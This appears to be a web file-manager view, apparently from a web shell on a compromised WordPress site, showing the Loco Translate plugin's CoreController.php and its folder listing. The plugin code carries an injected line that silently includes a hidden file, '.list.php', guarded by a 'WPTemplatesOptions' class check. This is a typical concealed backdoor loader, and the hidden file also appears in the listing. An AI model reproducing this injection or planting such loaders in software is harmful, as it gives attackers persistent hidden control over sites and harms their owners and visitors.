PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
loco-translate
/
src
/
admin
/
list
<?php /** * Dummy controller skips "core" list view, rendering the core projects directly as a single bundle. * Route: loco-core -> loco-core-view */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Loco_admin_list_CoreController extends Loco_admin_RedirectController { /** * {@inheritdoc} */ public function getLocation(){ return Loco_mvc_AdminRouter::generate('core-view'); } }
[+]
..
[-] BaseController.php
[edit]
[-] ThemesController.php
[edit]
[-] LocalesController.php
[edit]
[-] PluginsController.php
[edit]
[-] .list.php
[edit]
[-] CoreController.php
[edit]